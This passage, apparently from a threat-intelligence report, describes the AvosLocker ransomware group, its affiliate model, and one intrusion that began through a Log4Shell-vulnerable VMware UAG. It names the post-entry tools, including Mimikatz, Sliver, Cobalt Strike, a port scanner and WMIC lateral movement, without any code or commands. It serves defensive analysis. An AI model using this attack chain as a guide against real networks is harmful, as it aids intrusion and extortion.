Avos is a ransomware group first identified in 2021 initially targeting Windows machines. More recently, a new ransomware variant of AvosLocker, named after the group, is also targeting Linux environments. Well-funded and financially motivated, Avos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, an affiliate program to recruit potential partners. The announcement of the program includes information about the features of the ransomware and lets affiliates know that AvosLocker operators will handle negotiation and extortion practices. The user “Avos” has also been observed trying to recruit individuals on the Russian forum XSS.
Typically, Avos uses spam email campaigns as an initial infection vector to deliver ransomware. In this particular incident, however, the initial vector was an ESXi server exposed on the internet over VMWare Horizon Unified Access Gateways (UAG), which was vulnerable to the Log4Shell vulnerability.
During the initial phases of the attack the threat actor made numerous steps to gain a foothold on the victim network. Several other payloads and malicious tools were observed on endpoints, along with the utilization of living-off-the-land binaries (LoLBins). Several PowerShell scripts downloaded additional files, including Mimikatz, a Sliver payload labeled “vmware_kb.exe”, and a .zip archive called “IIS Temporary Compressed Files.zip” containing Cobalt Strike beacons and a port scanner labeled “scanner.exe.” This port scanner is a commercially available product which Avos is known for deploying called SoftPerfect Network Scanner. Later that same day, the attackers utilized WMIC to modify administrative settings on both a local and a remote host, behavior that is indicative of the first stages of lateral movement.